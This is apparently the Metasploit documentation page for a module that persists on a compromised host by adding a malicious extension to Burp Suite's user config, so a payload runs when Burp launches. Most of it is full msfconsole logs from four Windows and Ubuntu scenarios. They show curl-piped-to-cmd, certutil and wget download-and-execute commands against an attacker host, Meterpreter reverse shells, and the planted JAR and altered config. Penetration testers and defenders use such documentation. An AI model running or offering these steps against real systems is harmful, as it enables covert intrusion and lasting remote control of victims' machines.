Path: blob/master/documentation/modules/exploit/multi/persistence/burp_extension.md
31164 views
Vulnerable Application
This module adds a java based malicious extension to the Burp Suite configuration file. When burp is opened, the extension will be loaded and the payload will be executed.
Tested against Burp Suite Community Edition v2024.9.4, on Ubuntu Desktop 24.04. Tested against Burp Suite Community Edition v2025.12.3 on Windows 10.
Verification Steps
Install burp
Start msfconsole
Get an initial shell on *nix or Windows
Do:
use exploit/multi/local/burp_extension_persistenceDo:
set session #Do:
set writabledir <directory>Do:
runOnce the extension is installed, and burp started, you should get a shell
Options
NAME
Name of the extension. If blank, a random name is closen.
CONFIG
Config file location on target. This is a User Settings file that an extension can be added to.
WritableDir
A directory where we can write the extension
USER
User to target, or current user if blank
GRADLE
If action is set to build, the local location of the gradle executable to build the extension with. Defaults to /usr/bin/gradle
Action
precompiled
Use pre-compiled bytecode, Gradle is not required
build
Build the extension locally with Gradle.
Scenarios
Burp 2025.12.3 on Windows 10, precompiled with Windows target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /VIFzePGTMLa1dcpTvMRQBg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Client 2.2.2.2 requested /w3 [*] Sending payload to 2.2.2.2 (curl/7.79.1) [*] Client 2.2.2.2 requested /VIFzePGTMLa1dcpTvMRQBg [*] Sending payload to 2.2.2.2 (curl/7.79.1) [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55729) at 2026-01-16 05:24:25 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1...
Install Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension [*] No payload configured, defaulting to java/meterpreter/reverse_tcp [*] Setting default action precompiled - view all 2 actions with the show actions command msf exploit(multi/persistence/burp_extension) > set session 1 session => 1 msf exploit(multi/persistence/burp_extension) > set target 2 target => 2 msf exploit(multi/persistence/burp_extension) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp msf exploit(multi/persistence/burp_extension) > set lport 9812 lport => 9812 msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop writabledir => c:\users\windows\desktop msf exploit(multi/persistence/burp_extension) > rexploit [*] Reloading module... [*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/v3fXAwPgMBDCL44G1aW0KQ %TEMP%\CYdTYFAds.exe & start /B %TEMP%\CYdTYFAds.exe [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf exploit(multi/persistence/burp_extension) > [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /v3fXAwPgMBDCL44G1aW0KQ [*] Started reverse TCP handler on 1.1.1.1:9812 [*] Running automatic check ("set AutoCheck false" to disable) [*] Home path detected as: C:\Users\windows [!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json [*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json [*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar [*] Creating extension [*] Using extension name: BuIwiN [*] Creating JAR file [*] Writing malicious extension to disk: c:\users\windows\desktop\BuIwiN.jar [*] Modifying Burp configuration and adding malicious extension [+] Config file saved in: /root/.msf4/loot/20260116054809_default_2.2.2.2_burp.config.json_765439.bin [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.4809/WIN10PROLICENSE_20260116.4809.rc
Launch Burp
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ [*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0) [*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ [*] Sending payload to 2.2.2.2 (CertUtil URL Agent) [*] Sending stage (230982 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:9812 -> 2.2.2.2:55876) at 2026-01-16 05:49:34 -0500
Burp 2025.12.3 on Windows 10, build with Java target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /VIFzePGTMLa1dcpTvMRQBg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55900) at 2026-01-16 05:53:50 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1...
Install Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension [*] No payload configured, defaulting to java/meterpreter/reverse_tcp [*] Setting default action precompiled - view all 2 actions with the show actions command msf exploit(multi/persistence/burp_extension) > set session 1 session => 1 msf exploit(multi/persistence/burp_extension) > set action build action => build msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp PAYLOAD => java/meterpreter/reverse_tcp msf exploit(multi/persistence/burp_extension) > set lport 9815 lport => 9815 msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop writabledir => c:\users\windows\desktop msf exploit(multi/persistence/burp_extension) > rexploit [*] Reloading module... [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf exploit(multi/persistence/burp_extension) > [*] Started reverse TCP handler on 1.1.1.1:9815 [*] Running automatic check ("set AutoCheck false" to disable) [+] Gradle found [*] Home path detected as: C:\Users\windows [!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json [*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json [*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar [*] Creating extension [*] Using extension name: IoWH [*] Creating JAR file [*] Building Burp extension jar file locally in /tmp/d20260116-127808-hkcygo openjdk version "21.0.10-ea" 2026-01-20 OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1) OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing) Starting a Gradle Daemon (subsequent builds will be faster) :clean UP-TO-DATE :compileJava :processResources :classes :jar :assemble :compileTestJava NO-SOURCE :processTestResources NO-SOURCE :testClasses UP-TO-DATE :test NO-SOURCE :check UP-TO-DATE :build BUILD SUCCESSFUL in 7s 4 actionable tasks: 3 executed, 1 up-to-date [+] Successfully built the jar file /tmp/d20260116-127808-hkcygo/build/libs/MetasploitPayloadExtension.jar [*] Writing malicious extension to disk: c:\users\windows\desktop\IoWH.jar [*] Modifying Burp configuration and adding malicious extension [+] Config file saved in: /root/.msf4/loot/20260116060148_default_2.2.2.2_burp.config.json_518370.bin
Launch Burp
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.0148/WIN10PROLICENSE_20260116.0148.rc [*] Sending stage (58073 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:9815 -> 2.2.2.2:56020) at 2026-01-16 06:14:57 -0500
Burp 2025.12.3 on Ubuntu 24.04, precompiled with Linux target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set srvport 8082 srvport => 8082 resource (/root/.msf4/msfconsole.rc)> set uripath l uripath => l resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4446 lport => 4446 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4446 [*] Using URL: http://1.1.1.1:8082/l [*] Server started. [*] Run the following command on the target machine: wget -qO wThmilCQ --no-check-certificate http://1.1.1.1:8082/l; chmod +x wThmilCQ; ./wThmilCQ& disown msf exploit(multi/script/web_delivery) > [*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 3.3.3.3 [*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:43276) at 2026-01-16 06:31:49 -0500 msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: ubuntu meterpreter > sysinfo Computer : 3.3.3.3 OS : Ubuntu 24.04 (Linux 6.14.0-37-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1...
Install Persistence
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp [*] Setting default action precompiled - view all 2 actions with the show actions command msf exploit(multi/persistence/burp_extension) > set session 1 session => 1 msf exploit(multi/persistence/burp_extension) > set target 1 target => 1 msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp msf exploit(multi/persistence/burp_extension) > set lport 9816 lport => 9816 msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/ writabledir => /home/ubuntu/Desktop/ msf exploit(multi/persistence/burp_extension) > rexploit [*] Reloading module... [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:9816 msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module: [!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs [*] Running automatic check ("set AutoCheck false" to disable) [*] Home path detected as: /home/ubuntu [!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json [*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json [*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar [*] Creating extension [*] Using extension name: KdqJR [*] Creating JAR file [*] Writing malicious extension to disk: /home/ubuntu/Desktop//KdqJR.jar [*] Modifying Burp configuration and adding malicious extension [+] Config file saved in: /root/.msf4/loot/20260116073105_default_3.3.3.3_burp.config.json_225090.bin [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.3105/3.3.3.3_20260116.3105.rc
Launch Burp
[*] Sending stage (23404 bytes) to 3.3.3.3 [*] Meterpreter session 2 opened (1.1.1.1:9816 -> 3.3.3.3:59798) at 2026-01-16 07:45:08 -0500 msf exploit(multi/persistence/burp_extension) >
Burp 2025.12.3 on Ubuntu 24.04, build with Java target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set srvport 8082 srvport => 8082 resource (/root/.msf4/msfconsole.rc)> set uripath l uripath => l resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4446 lport => 4446 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4446 [*] Using URL: http://1.1.1.1:8082/l [*] Server started. [*] Run the following command on the target machine: wget -qO z9hg2BUt --no-check-certificate http://1.1.1.1:8082/l; chmod +x z9hg2BUt; ./z9hg2BUt& disown msf exploit(multi/script/web_delivery) > [*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 3.3.3.3 [*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:59534) at 2026-01-16 07:54:07 -0500 msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: ubuntu meterpreter > sysinfo Computer : 3.3.3.3 OS : Ubuntu 24.04 (Linux 6.14.0-37-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1...
Install Persistence
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp [*] Setting default action precompiled - view all 2 actions with the show actions command msf exploit(multi/persistence/burp_extension) > set session 1 session => 1 msf exploit(multi/persistence/burp_extension) > set action build action => build msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp PAYLOAD => java/meterpreter/reverse_tcp msf exploit(multi/persistence/burp_extension) > set lport 9817 lport => 9817 msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/ writabledir => /home/ubuntu/Desktop/ msf exploit(multi/persistence/burp_extension) > rexploit [*] Reloading module... [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:9817 msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module: [!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs [*] Running automatic check ("set AutoCheck false" to disable) [+] Gradle found [*] Home path detected as: /home/ubuntu [!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json [*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json [*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar [*] Creating extension [*] Using extension name: YBFkQz [*] Creating JAR file [*] Building Burp extension jar file locally in /tmp/d20260116-130356-yxz2cv openjdk version "21.0.10-ea" 2026-01-20 OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1) OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing) :clean UP-TO-DATE :compileJava :processResources :classes :jar :assemble :compileTestJava NO-SOURCE :processTestResources NO-SOURCE :testClasses UP-TO-DATE :test NO-SOURCE :check UP-TO-DATE :build BUILD SUCCESSFUL in 1s 4 actionable tasks: 3 executed, 1 up-to-date [+] Successfully built the jar file /tmp/d20260116-130356-yxz2cv/build/libs/MetasploitPayloadExtension.jar [*] Writing malicious extension to disk: /home/ubuntu/Desktop//YBFkQz.jar [*] Modifying Burp configuration and adding malicious extension [+] Config file saved in: /root/.msf4/loot/20260116075456_default_3.3.3.3_burp.config.json_053290.bin [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.5456/3.3.3.3_20260116.5456.rc
Launch Burp
[*] Sending stage (58073 bytes) to 3.3.3.3 [*] Meterpreter session 2 opened (1.1.1.1:9817 -> 3.3.3.3:52712) at 2026-01-16 07:55:28 -0500